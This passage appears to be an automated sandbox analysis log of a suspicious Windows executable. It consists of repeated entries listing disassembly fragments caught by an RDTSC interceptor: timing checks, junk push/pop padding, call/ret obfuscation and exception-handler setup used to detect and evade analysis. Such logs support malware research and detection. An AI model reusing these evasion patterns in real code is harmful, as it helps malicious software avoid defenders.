                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 102050D second address: 1020531 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3778D7B2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3778D7B2C4h 0x00000015 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1020531 second address: 1020537 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1020F2D second address: 1020F32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1020F32 second address: 1020F37 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1021F43 second address: 1021F9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3778D7B2C9h 0x00000009 popad 0x0000000a jmp 00007F3778D7B2C2h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 mov di, 3A4Ah 0x00000017 jmp 00007F3778D7B2BCh 0x0000001c push 00000000h 0x0000001e mov si, 8493h 0x00000022 sub dword ptr [ebp+12483A58h], eax 0x00000028 push 00000000h 0x0000002a push ebx 0x0000002b pop esi 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f push edi 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1021F9D second address: 1021FA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 10217AD second address: 10217C4 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3778D7B2B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007F3778D7B2B6h 0x00000015 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 10217C4 second address: 10217D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7C02Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1022A27 second address: 1022A2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 10249C0 second address: 10249C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 102842C second address: 1028431 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1028431 second address: 1028482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov esi, dword ptr [ebp+122D295Dh] 0x00000011 popad 0x00000012 mov edi, dword ptr [ebp+12480194h] 0x00000018 push 00000000h 0x0000001a mov ebx, dword ptr [ebp+122D2ACDh] 0x00000020 mov ebx, 74FA4700h 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebx 0x0000002a call 00007F3778D7C028h 0x0000002f pop ebx 0x00000030 mov dword ptr [esp+04h], ebx 0x00000034 add dword ptr [esp+04h], 0000001Ch 0x0000003c inc ebx 0x0000003d push ebx 0x0000003e ret 0x0000003f pop ebx 0x00000040 ret 0x00000041 xchg eax, esi 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1028482 second address: 1028486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1028486 second address: 102848A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 102848A second address: 1028494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1028494 second address: 1028498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 102BE2F second address: 102BE33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 102BE33 second address: 102BE37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 102EFE6 second address: 102EFEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 102E27A second address: 102E27F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 102E27F second address: 102E285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 102EFEA second address: 102F05D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F3778D7C038h 0x0000000d nop 0x0000000e push edi 0x0000000f mov dword ptr [ebp+122D2803h], eax 0x00000015 pop ebx 0x00000016 jmp 00007F3778D7C02Eh 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push esi 0x00000020 call 00007F3778D7C028h 0x00000025 pop esi 0x00000026 mov dword ptr [esp+04h], esi 0x0000002a add dword ptr [esp+04h], 00000019h 0x00000032 inc esi 0x00000033 push esi 0x00000034 ret 0x00000035 pop esi 0x00000036 ret 0x00000037 mov dword ptr [ebp+12455AA3h], esi 0x0000003d mov ebx, dword ptr [ebp+1246FE60h] 0x00000043 push 00000000h 0x00000045 xor di, 91A5h 0x0000004a xchg eax, esi 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 102F05D second address: 102F061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 102E285 second address: 102E296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jng 00007F3778D7C02Eh 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 102F061 second address: 102F065 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1030061 second address: 10300CE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov edi, ecx 0x00000009 push 00000000h 0x0000000b mov ebx, 081CDF00h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007F3778D7C028h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c xor edi, 79290093h 0x00000032 call 00007F3778D7C02Fh 0x00000037 jnl 00007F3778D7C02Ch 0x0000003d pop ebx 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 jmp 00007F3778D7C033h 0x00000047 push edi 0x00000048 pop edi 0x00000049 popad 0x0000004a rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1031009 second address: 1031080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 ja 00007F3778D7B2C2h 0x0000000d jbe 00007F3778D7B2BCh 0x00000013 nop 0x00000014 and bl, FFFFFFE0h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007F3778D7B2B8h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 00000017h 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 jmp 00007F3778D7B2BEh 0x00000038 add ebx, dword ptr [ebp+122D193Ch] 0x0000003e push 00000000h 0x00000040 mov edi, 4BA30EA2h 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 ja 00007F3778D7B2CBh 0x0000004e rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1032074 second address: 10320F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebx 0x0000000e nop 0x0000000f sub dword ptr [ebp+122D1A44h], edx 0x00000015 push 00000000h 0x00000017 jmp 00007F3778D7C037h 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 call 00007F3778D7C028h 0x00000026 pop edx 0x00000027 mov dword ptr [esp+04h], edx 0x0000002b add dword ptr [esp+04h], 0000001Bh 0x00000033 inc edx 0x00000034 push edx 0x00000035 ret 0x00000036 pop edx 0x00000037 ret 0x00000038 mov dword ptr [ebp+12453D1Ah], edi 0x0000003e xchg eax, esi 0x0000003f jmp 00007F3778D7C037h 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 jnc 00007F3778D7C028h 0x0000004d rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 103120B second address: 1031210 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1031210 second address: 103127F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov bl, CAh 0x0000000c push dword ptr fs:[00000000h] 0x00000013 mov ebx, dword ptr [ebp+122D24A7h] 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 mov ebx, dword ptr [ebp+122D339Ch] 0x00000026 mov eax, dword ptr [ebp+122D0C8Dh] 0x0000002c mov di, 7197h 0x00000030 push FFFFFFFFh 0x00000032 push 00000000h 0x00000034 push esi 0x00000035 call 00007F3778D7C028h 0x0000003a pop esi 0x0000003b mov dword ptr [esp+04h], esi 0x0000003f add dword ptr [esp+04h], 00000014h 0x00000047 inc esi 0x00000048 push esi 0x00000049 ret 0x0000004a pop esi 0x0000004b ret 0x0000004c call 00007F3778D7C031h 0x00000051 or bx, 3689h 0x00000056 pop edi 0x00000057 nop 0x00000058 pushad 0x00000059 jnp 00007F3778D7C02Ch 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 103127F second address: 1031290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1031290 second address: 1031297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1031297 second address: 103129D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1033046 second address: 103304A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 103304A second address: 103305A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7B2BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1033EE8 second address: 1033EEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1033EEC second address: 1033EFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1034EAC second address: 1034EC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F3778D7C02Dh 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1034EC6 second address: 1034EDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7B2C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1035D09 second address: 1035D0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 103312D second address: 1033132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 103401D second address: 10340B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3778D7C035h 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007F3778D7C030h 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007F3778D7C028h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 00000014h 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e stc 0x0000002f mov dword ptr [ebp+124686C1h], eax 0x00000035 push dword ptr fs:[00000000h] 0x0000003c jo 00007F3778D7C026h 0x00000042 mov di, A1B7h 0x00000046 mov dword ptr fs:[00000000h], esp 0x0000004d mov ebx, 6AAF3012h 0x00000052 mov eax, dword ptr [ebp+122D12C9h] 0x00000058 push FFFFFFFFh 0x0000005a mov ebx, esi 0x0000005c mov dword ptr [ebp+12455A48h], ebx 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 js 00007F3778D7C034h 0x0000006b jmp 00007F3778D7C02Eh 0x00000070 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 10340B3 second address: 10340B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 10340B9 second address: 10340BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 103507D second address: 1035097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3778D7B2C1h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1035097 second address: 103509B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 104119F second address: 10411A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 10411A3 second address: 10411A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1041322 second address: 104132A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 10487E8 second address: 10487EE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 104AA7A second address: 104AA7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 104ED18 second address: 104ED3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F3778D7C026h 0x0000000a jmp 00007F3778D7C038h 0x0000000f rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 104F994 second address: 104F99B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 104F99B second address: 104F9DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F3778D7C034h 0x0000000f je 00007F3778D7C026h 0x00000015 popad 0x00000016 push ebx 0x00000017 jmp 00007F3778D7C035h 0x0000001c jne 00007F3778D7C026h 0x00000022 pop ebx 0x00000023 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 104FB7F second address: 104FB85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 104FB85 second address: 104FBA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3778D7C039h 0x00000009 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 104FBA2 second address: 104FBCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7B2C5h 0x00000007 jbe 00007F3778D7B2B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jo 00007F3778D7B2B6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 104FD63 second address: 104FD75 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jc 00007F3778D7C026h 0x00000012 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 104FECB second address: 104FECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1055837 second address: 105584A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jp 00007F3778D7C026h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 105584A second address: 1055870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jno 00007F3778D7B2BAh 0x0000000b popad 0x0000000c push ebx 0x0000000d pushad 0x0000000e jmp 00007F3778D7B2C2h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1055870 second address: 105587A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1054694 second address: 105469C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 105469C second address: 10546A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 10546A1 second address: 10546C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 je 00007F3778D7B2B6h 0x0000000b jmp 00007F3778D7B2BBh 0x00000010 popad 0x00000011 pushad 0x00000012 jg 00007F3778D7B2B6h 0x00000018 push edx 0x00000019 pop edx 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 10546C9 second address: 10546DF instructions: 0x00000000 rdtsc 0x00000002 js 00007F3778D7C026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop esi 0x0000000e jbe 00007F3778D7C02Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1054BE2 second address: 1054BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1055027 second address: 1055034 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jnl 00007F3778D7C026h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1055034 second address: 105503A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 105A0C9 second address: 105A0E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jmp 00007F3778D7C02Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 105A0E1 second address: 105A0E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 105A0E7 second address: 105A0EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 102658B second address: 1026591 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1026591 second address: 102663D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebx 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F3778D7C028h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D26A0h], ecx 0x0000002d push dword ptr fs:[00000000h] 0x00000034 jmp 00007F3778D7C034h 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 sub dword ptr [ebp+1245DF88h], edi 0x00000046 mov dword ptr [ebp+1248B293h], esp 0x0000004c sub dword ptr [ebp+122D1C8Dh], eax 0x00000052 cmp dword ptr [ebp+122D29D1h], 00000000h 0x00000059 jne 00007F3778D7C0B3h 0x0000005f mov edx, dword ptr [ebp+122D2AC5h] 0x00000065 mov byte ptr [ebp+122D24BDh], 00000047h 0x0000006c or edi, 37DF3B78h 0x00000072 mov eax, D49AA7D2h 0x00000077 and cx, CBBDh 0x0000007c push eax 0x0000007d pushad 0x0000007e push edi 0x0000007f jmp 00007F3778D7C033h 0x00000084 pop edi 0x00000085 push eax 0x00000086 push edx 0x00000087 push eax 0x00000088 pop eax 0x00000089 rdtsc
